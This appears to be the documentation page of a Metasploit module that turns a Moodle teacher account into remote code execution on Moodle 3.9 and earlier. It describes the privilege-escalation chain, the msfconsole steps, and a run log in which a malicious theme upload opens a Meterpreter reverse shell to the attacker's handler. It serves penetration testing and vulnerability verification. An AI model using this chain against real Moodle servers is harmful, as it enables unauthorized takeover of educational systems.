## Vulnerable Application

Moodle version 3.9, 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions
allow for a teacher to exploit chain to RCE.  A bug in the privileges system allows a teacher
to add themselves as a manager to their own class. They can then add any other users, and thus
look to add someone with manager privileges on the system (not just the class).  After
adding a system manager, a 'loginas' feature is used to access their account.  Next the system
is reconfigured to allow for all users to install an addon/plugin.  Then a malicious theme
is uploaded and creates an RCE.

If all of that is a success, we revert permissions for managers to system default and
remove our malicoius theme.  Manual cleanup to remove students from the class is required.

This module was tested against Moodle version 3.9

### Install

Moodle provides a step by step guide to install their software.  However you'll want to use
`3.9.0` isntead of `3.11.0`.
[here](https://docs.moodle.org/311/en/Step-by-step_Installation_Guide_for_Ubuntu)

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploits/multi/http/moodle_teacher_enrollment_priv_esc_to_rce`
1. Do: `set username [username]`
1. Do: `set password [password]`
1. Do: `run`
1. You should get a shell.

## Options

### MAXUSERS

The amount of users to add to the class in hopes of finding a manager. Defaults to `100`.

### Passowrd

Password of a teacher.

### Username

Username of a teacher.

## Scenarios

### Moodle 3.9.0 on Ubuntu 20.04

```
resource (moodle_privesc.rb)> use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (moodle_privesc.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_privesc.rb)> set targeturi /moodle-3.9.0/
targeturi => /moodle-3.9.0/
resource (moodle_privesc.rb)> set username teacher
username => teacher
resource (moodle_privesc.rb)> set password Teacherteacher1!
password => Teacherteacher1!
resource (moodle_privesc.rb)> set lhost eth0
lhost => eth0
resource (moodle_privesc.rb)> set MAXUSERS 10
MAXUSERS => 10
resource (moodle_privesc.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.9 detected
[*] Authenticating as user: teacher
[*] Retrieving user info
[+] User ID: 4
[+] Course ID: 2
[+] Sessionkey: R1lSAKDT73
[*] Retrieving course enrollment id
[+] Enrol ID: 1
[*] Attempting to enrolin in class as manager (priv esc)
[+] Successfully enrolled
[*] Attempting to find and add a manager to class
[*] Attempting user: 2
[+] Successfully enrolled
[*] Attempting user: 3
[+] Successfully enrolled
[*] Attempting user: 4
[+] Successfully enrolled
[*] Attempting user: 5
[+] Successfully enrolled
[*] Attempting user: 6
[-] Unsuccessful
[*] Attempting user: 7
[-] Unsuccessful
[*] Attempting user: 8
[-] Unsuccessful
[*] Attempting user: 9
[-] Unsuccessful
[*] Retrieving course context id
[+] Context ID: 28
[+] Found manager user IDs: ["5", "4"]
[*] Attempting loginas for user id: 5
[*] Logged in as: manager manager
[+] Looks like a potentially good manager account!
[*] Attempting via new session key: gUocfkXDpe
[*] Checking if permissions were set successfully
[+] Manager roll full permissioned, attempting to upload shell
[*] Creating plugin named: mbdzduot with poisoned header: PIYB
[*] Uploading addon
[+] Upload Successful.  Integrating addon
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56418) at 2021-09-04 13:21:51 -0400
[*] Uninstalling plugin
[*] Resetting permissions

meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
```
